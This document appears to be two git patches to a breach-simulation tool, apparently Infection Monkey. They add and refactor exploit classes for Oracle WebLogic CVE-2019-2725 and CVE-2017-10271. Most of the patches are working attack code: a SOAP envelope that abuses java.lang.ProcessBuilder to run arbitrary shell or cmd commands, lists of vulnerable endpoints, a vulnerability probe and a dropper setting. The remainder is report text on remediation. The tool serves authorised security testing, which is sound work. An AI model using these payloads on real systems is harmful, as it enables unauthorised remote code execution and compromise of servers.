From d0d0f13a43e873b48ae407f4530f62a60190f0d4 Mon Sep 17 00:00:00 2001
From: VakarisZ <vakarisz@yahoo.com>
Date: Tue, 18 Jun 2019 13:38:05 +0300
Subject: [PATCH 1/2] WebLogic CVE-2019-2725 implemented

---
 monkey/infection_monkey/exploit/weblogic.py   | 130 +++++++++++++++---
 .../cc/ui/src/components/pages/ReportPage.js  |  13 +-
 2 files changed, 115 insertions(+), 28 deletions(-)

diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py
index 4c99f82b9..83439e64f 100644
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -14,6 +14,7 @@ from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
 import threading
 import logging
 import time
+import copy
 
 __author__ = "VakarisZ"
 
@@ -21,28 +22,28 @@ LOG = logging.getLogger(__name__)
 # How long server waits for get request in seconds
 SERVER_TIMEOUT = 4
 # How long should be wait after each request in seconds
-REQUEST_DELAY = 0.0001
+REQUEST_DELAY = 0.1
 # How long to wait for a sign(request from host) that server is vulnerable. In seconds
 REQUEST_TIMEOUT = 5
 # How long to wait for response in exploitation. In seconds
 EXECUTION_TIMEOUT = 15
-URLS = ["/wls-wsat/CoordinatorPortType",
-        "/wls-wsat/CoordinatorPortType11",
-        "/wls-wsat/ParticipantPortType",
-        "/wls-wsat/ParticipantPortType11",
-        "/wls-wsat/RegistrationPortTypeRPC",
-        "/wls-wsat/RegistrationPortTypeRPC11",
-        "/wls-wsat/RegistrationRequesterPortType",
-        "/wls-wsat/RegistrationRequesterPortType11"]
-# Malicious request's headers:
-HEADERS = {
-            "Content-Type": "text/xml;charset=UTF-8",
-            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
-                          "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
-          }
 
 
 class WebLogicExploiter(WebRCE):
+    URLS = ["/wls-wsat/CoordinatorPortType",
+            "/wls-wsat/CoordinatorPortType11",
+            "/wls-wsat/ParticipantPortType",
+            "/wls-wsat/ParticipantPortType11",
+            "/wls-wsat/RegistrationPortTypeRPC",
+            "/wls-wsat/RegistrationPortTypeRPC11",
+            "/wls-wsat/RegistrationRequesterPortType",
+            "/wls-wsat/RegistrationRequesterPortType11"]
+    # Malicious request's headers:
+    HEADERS = {
+        "Content-Type": "text/xml;charset=UTF-8",
+        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
+                      "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
+    }
     _TARGET_OS_TYPE = ['linux', 'windows']
     _EXPLOITED_SERVICE = 'Weblogic'
 
@@ -55,19 +56,29 @@ class WebLogicExploiter(WebRCE):
         exploit_config = super(WebLogicExploiter, self).get_exploit_config()
         exploit_config['blind_exploit'] = True
         exploit_config['stop_checking_urls'] = True
-        exploit_config['url_extensions'] = URLS
+        exploit_config['url_extensions'] = WebLogicExploiter.URLS
         return exploit_config
 
+    def exploit_host(self):
+        exploiters = [WebLogic20192725]
+        for exploiter in exploiters:
+            if exploiter(self.host).exploit_host():
+                return True
+        if super(WebLogicExploiter, self).exploit_host():
+            return True
+        else:
+            return False
+
     def exploit(self, url, command):
         if 'linux' in self.host.os['type']:
             payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
         else:
             payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
         try:
-            post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
+            post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
         except Exception as e:
-            print('[!] Connection Error')
-            print(e)
+            LOG.error("Connection error: %s" % e)
+            return False
 
         return True
 
@@ -100,7 +111,7 @@ class WebLogicExploiter(WebRCE):
     def check_if_exploitable_weblogic(self, url, httpd):
         payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
         try:
-            post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
+            post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=REQUEST_DELAY, verify=False)
         except exceptions.ReadTimeout:
             # Our request will not get response thus we get ReadTimeout error
             pass
@@ -224,3 +235,82 @@ class WebLogicExploiter(WebRCE):
 
         def stop(self):
             self._stopped = True
+
+
+# Exploit based of:
+# Andres Rodriguez (acamro)
+# https://github.com/rapid7/metasploit-framework/pull/11780
+class WebLogic20192725(WebRCE):
+    URLS = ["_async/AsyncResponseServiceHttps"]
+
+    _TARGET_OS_TYPE = ['linux', 'windows']
+    _EXPLOITED_SERVICE = 'Weblogic'
+
+    def __init__(self, host):
+        super(WebLogic20192725, self).__init__(host)
+
+    def get_exploit_config(self):
+        exploit_config = super(WebLogic20192725, self).get_exploit_config()
+        exploit_config['url_extensions'] = WebLogic20192725.URLS
+        exploit_config['blind_exploit'] = True
+        exploit_config['dropper'] = True
+        return exploit_config
+
+    def exploit(self, url, command):
+        if 'linux' in self.host.os['type']:
+            payload = self.get_exploit_payload('/bin/sh', '-c', command)
+        else:
+            payload = self.get_exploit_payload('cmd', '/c', command)
+        try:
+            resp = post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT)
+            return resp
+        except Exception as e:
+            LOG.error("Connection error: %s" % e)
+            return False
+
+    def check_if_exploitable(self, url):
+        headers = copy.deepcopy(WebLogicExploiter.HEADERS).update({'SOAPAction': ''})
+        res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
+        if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
+            return True
+        else:
+            return False
+
+    @staticmethod
+    def get_exploit_payload(cmd_base, cmd_opt, command):
+        """
+        Formats the payload used to exploit weblogic servers
+        :param cmd_base: What command prompt to use eg. cmd
+        :param cmd_opt: cmd_base commands parameters. eg. /c (to run command)
+        :param command: command itself
+        :return: Formatted payload
+        """
+        empty_payload = '''
+        <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" 
+        xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">
+            <soapenv:Header>
+                <wsa:Action>xx</wsa:Action>
+                <wsa:RelatesTo>xx</wsa:RelatesTo>
+                <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">
+                    <void class=\"java.lang.ProcessBuilder\">
+                        <array class=\"java.lang.String\" length=\"3\">
+                            <void index=\"0\">
+                                <string>{cmd_base}</string>
+                            </void>
+                            <void index=\"1\">
+                                <string>{cmd_opt}</string>
+                            </void>
+                            <void index=\"2\">
+                                <string>{cmd_payload}</string>
+                            </void>
+                        </array>
+                        <void method=\"start\"/>
+                    </void>
+                </work:WorkContext>
+            </soapenv:Header>
+            <soapenv:Body>
+                <asy:onAsyncDelivery/>
+            </soapenv:Body>
+        </soapenv:Envelope>'''
+        payload = empty_payload.format(cmd_base=cmd_base, cmd_opt=cmd_opt, cmd_payload=command)
+        return payload
diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
index adc0911d8..40ef7ba7f 100644
--- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
@@ -308,7 +308,7 @@ class ReportPageComponent extends AuthComponent {
                     }).length} threats</span>:
                 <ul>
                   {this.state.report.overview.issues[this.Issue.STOLEN_SSH_KEYS] ?
-                    <li>Stolen SSH keys are used to exploit other machines.</li> : null }                  
+                    <li>Stolen SSH keys are used to exploit other machines.</li> : null }
                   {this.state.report.overview.issues[this.Issue.STOLEN_CREDS] ?
                     <li>Stolen credentials are used to exploit other machines.</li> : null}
                   {this.state.report.overview.issues[this.Issue.ELASTIC] ?
@@ -889,16 +889,13 @@ class ReportPageComponent extends AuthComponent {
   generateWebLogicIssue(issue) {
     return (
       <li>
-        Install Oracle <a href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">
-        critical patch updates.</a> Or update to the latest version. Vulnerable versions are
-        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+        Update Oracle WebLogic server to the latest supported version.
         <CollapsibleWellComponent>
           Oracle WebLogic server at <span className="label label-primary">{issue.machine}</span> (<span
-          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to <span
-          className="label label-danger">remote code execution</span> attack.
+          className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to one of <span
+          className="label label-danger">remote code execution</span> attacks.
           <br/>
-          The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware
-          (subcomponent: WLS Security).
+          The attack was made possible due to one of the following vulnerabilities: CVE-2017-10271 or CVE-2019-2725
         </CollapsibleWellComponent>
       </li>
     );

From c5e1b0a93f3a32cd9fbd6236131f3d4d429bce1e Mon Sep 17 00:00:00 2001
From: VakarisZ <vakarisz@yahoo.com>
Date: Mon, 1 Jul 2019 13:53:37 +0300
Subject: [PATCH 2/2] WeblogicExploiter class refactored to only handle
 vulnerability execution.

---
 monkey/infection_monkey/exploit/weblogic.py   | 112 ++++++++++--------
 .../cc/services/config_schema.py              |   2 +-
 .../cc/ui/src/components/pages/ReportPage.js  |   8 +-
 3 files changed, 65 insertions(+), 57 deletions(-)

diff --git a/monkey/infection_monkey/exploit/weblogic.py b/monkey/infection_monkey/exploit/weblogic.py
index 83439e64f..300f52f0e 100644
--- a/monkey/infection_monkey/exploit/weblogic.py
+++ b/monkey/infection_monkey/exploit/weblogic.py
@@ -1,3 +1,48 @@
+from __future__ import print_function
+import threading
+import logging
+import time
+import copy
+
+from requests import post, exceptions
+from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
+
+from infection_monkey.exploit.web_rce import WebRCE
+from infection_monkey.exploit import HostExploiter
+from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
+
+
+__author__ = "VakarisZ"
+
+LOG = logging.getLogger(__name__)
+# How long server waits for get request in seconds
+SERVER_TIMEOUT = 4
+# How long should we wait after each request in seconds
+REQUEST_DELAY = 0.1
+# How long to wait for a sign(request from host) that server is vulnerable. In seconds
+REQUEST_TIMEOUT = 5
+# How long to wait for response in exploitation. In seconds
+EXECUTION_TIMEOUT = 15
+# Malicious requests' headers:
+HEADERS = {
+    "Content-Type": "text/xml;charset=UTF-8",
+    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
+                  "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
+}
+
+
+class WebLogicExploiter(HostExploiter):
+
+    _TARGET_OS_TYPE = ['linux', 'windows']
+    _EXPLOITED_SERVICE = 'Weblogic'
+
+    def exploit_host(self):
+        exploiters = [WebLogic20192725, WebLogic201710271]
+        for exploiter in exploiters:
+            if exploiter(self.host).exploit_host():
+                return True
+
+
 # Exploit based of:
 # Kevin Kirsche (d3c3pt10n)
 # https://github.com/kkirsche/CVE-2017-10271
@@ -5,31 +50,7 @@
 # Luffin from Github
 # https://github.com/Luffin/CVE-2017-10271
 # CVE: CVE-2017-10271
-from __future__ import print_function
-from requests import post, exceptions
-from infection_monkey.exploit.web_rce import WebRCE
-from infection_monkey.exploit.tools import get_free_tcp_port, get_interface_to_target
-from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
-
-import threading
-import logging
-import time
-import copy
-
-__author__ = "VakarisZ"
-
-LOG = logging.getLogger(__name__)
-# How long server waits for get request in seconds
-SERVER_TIMEOUT = 4
-# How long should be wait after each request in seconds
-REQUEST_DELAY = 0.1
-# How long to wait for a sign(request from host) that server is vulnerable. In seconds
-REQUEST_TIMEOUT = 5
-# How long to wait for response in exploitation. In seconds
-EXECUTION_TIMEOUT = 15
-
-
-class WebLogicExploiter(WebRCE):
+class WebLogic201710271(WebRCE):
     URLS = ["/wls-wsat/CoordinatorPortType",
             "/wls-wsat/CoordinatorPortType11",
             "/wls-wsat/ParticipantPortType",
@@ -38,44 +59,29 @@ class WebLogicExploiter(WebRCE):
             "/wls-wsat/RegistrationPortTypeRPC11",
             "/wls-wsat/RegistrationRequesterPortType",
             "/wls-wsat/RegistrationRequesterPortType11"]
-    # Malicious request's headers:
-    HEADERS = {
-        "Content-Type": "text/xml;charset=UTF-8",
-        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) "
-                      "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
-    }
-    _TARGET_OS_TYPE = ['linux', 'windows']
-    _EXPLOITED_SERVICE = 'Weblogic'
+
+    _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
+    _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
 
     def __init__(self, host):
-        super(WebLogicExploiter, self).__init__(host, {'linux': '/tmp/monkey.sh',
+        super(WebLogic201710271, self).__init__(host, {'linux': '/tmp/monkey.sh',
                                                        'win32': 'monkey32.exe',
                                                        'win64': 'monkey64.exe'})
 
     def get_exploit_config(self):
-        exploit_config = super(WebLogicExploiter, self).get_exploit_config()
+        exploit_config = super(WebLogic201710271, self).get_exploit_config()
         exploit_config['blind_exploit'] = True
         exploit_config['stop_checking_urls'] = True
-        exploit_config['url_extensions'] = WebLogicExploiter.URLS
+        exploit_config['url_extensions'] = WebLogic201710271.URLS
         return exploit_config
 
-    def exploit_host(self):
-        exploiters = [WebLogic20192725]
-        for exploiter in exploiters:
-            if exploiter(self.host).exploit_host():
-                return True
-        if super(WebLogicExploiter, self).exploit_host():
-            return True
-        else:
-            return False
-
     def exploit(self, url, command):
         if 'linux' in self.host.os['type']:
             payload = self.get_exploit_payload('/bin/sh', '-c', command + ' 1> /dev/null 2> /dev/null')
         else:
             payload = self.get_exploit_payload('cmd', '/c', command + ' 1> NUL 2> NUL')
         try:
-            post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
+            post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT, verify=False)
         except Exception as e:
             LOG.error("Connection error: %s" % e)
             return False
@@ -111,7 +117,7 @@ class WebLogicExploiter(WebRCE):
     def check_if_exploitable_weblogic(self, url, httpd):
         payload = self.get_test_payload(ip=httpd.local_ip, port=httpd.local_port)
         try:
-            post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=REQUEST_DELAY, verify=False)
+            post(url, data=payload, headers=HEADERS, timeout=REQUEST_DELAY, verify=False)
         except exceptions.ReadTimeout:
             # Our request will not get response thus we get ReadTimeout error
             pass
@@ -207,6 +213,7 @@ class WebLogicExploiter(WebRCE):
         Http server built to wait for GET requests. Because oracle web logic vuln is blind,
         we determine if we can exploit by either getting a GET request from host or not.
         """
+
         def __init__(self, local_ip, local_port, lock, max_requests=1):
             self.local_ip = local_ip
             self.local_port = local_port
@@ -223,6 +230,7 @@ class WebLogicExploiter(WebRCE):
                 def do_GET():
                     LOG.info('Server received a request from vulnerable machine')
                     self.get_requests += 1
+
             LOG.info('Server waiting for exploited machine request...')
             httpd = HTTPServer((self.local_ip, self.local_port), S)
             httpd.daemon = True
@@ -243,8 +251,8 @@ class WebLogicExploiter(WebRCE):
 class WebLogic20192725(WebRCE):
     URLS = ["_async/AsyncResponseServiceHttps"]
 
-    _TARGET_OS_TYPE = ['linux', 'windows']
-    _EXPLOITED_SERVICE = 'Weblogic'
+    _TARGET_OS_TYPE = WebLogicExploiter._TARGET_OS_TYPE
+    _EXPLOITED_SERVICE = WebLogicExploiter._EXPLOITED_SERVICE
 
     def __init__(self, host):
         super(WebLogic20192725, self).__init__(host)
@@ -262,14 +270,14 @@ class WebLogic20192725(WebRCE):
         else:
             payload = self.get_exploit_payload('cmd', '/c', command)
         try:
-            resp = post(url, data=payload, headers=WebLogicExploiter.HEADERS, timeout=EXECUTION_TIMEOUT)
+            resp = post(url, data=payload, headers=HEADERS, timeout=EXECUTION_TIMEOUT)
             return resp
         except Exception as e:
             LOG.error("Connection error: %s" % e)
             return False
 
     def check_if_exploitable(self, url):
-        headers = copy.deepcopy(WebLogicExploiter.HEADERS).update({'SOAPAction': ''})
+        headers = copy.deepcopy(HEADERS).update({'SOAPAction': ''})
         res = post(url, headers=headers, timeout=EXECUTION_TIMEOUT)
         if res.status_code == 500 and "<faultcode>env:Client</faultcode>" in res.text:
             return True
diff --git a/monkey/monkey_island/cc/services/config_schema.py b/monkey/monkey_island/cc/services/config_schema.py
index 46129266c..4c4df247e 100644
--- a/monkey/monkey_island/cc/services/config_schema.py
+++ b/monkey/monkey_island/cc/services/config_schema.py
@@ -89,7 +89,7 @@ SCHEMA = {
                     "enum": [
                         "WebLogicExploiter"
                     ],
-                    "title": "Oracle Web Logic Exploiter"
+                    "title": "WebLogic Exploiter"
                 },
                 {
                     "type": "string",
diff --git a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
index 40ef7ba7f..52e8cbdfb 100644
--- a/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
+++ b/monkey/monkey_island/cc/ui/src/components/pages/ReportPage.js
@@ -343,9 +343,7 @@ class ReportPageComponent extends AuthComponent {
                       href="https://cwiki.apache.org/confluence/display/WW/S2-045">
                       CVE-2017-5638</a>)</li> : null }
                   {this.state.report.overview.issues[this.Issue.WEBLOGIC] ?
-                    <li>Oracle WebLogic servers are vulnerable to remote code execution. (<a
-                      href="https://nvd.nist.gov/vuln/detail/CVE-2017-10271">
-                      CVE-2017-10271</a>)</li> : null }
+                    <li>Oracle WebLogic servers are susceptible to a remote code execution vulnerability.</li> : null }
                   {this.state.report.overview.issues[this.Issue.HADOOP] ?
                     <li>Hadoop/Yarn servers are vulnerable to remote code execution.</li> : null }
                   {this.state.report.overview.issues[this.Issue.PTH_CRIT_SERVICES_ACCESS] ?
@@ -895,7 +893,9 @@ class ReportPageComponent extends AuthComponent {
           className="label label-info" style={{margin: '2px'}}>{issue.ip_address}</span>) is vulnerable to one of <span
           className="label label-danger">remote code execution</span> attacks.
           <br/>
-          The attack was made possible due to one of the following vulnerabilities: CVE-2017-10271 or CVE-2019-2725
+          The attack was made possible due to one of the following vulnerabilities:
+          <a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271"}> CVE-2017-10271</a> or
+          <a href={"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2725"}> CVE-2019-2725</a>
         </CollapsibleWellComponent>
       </li>
     );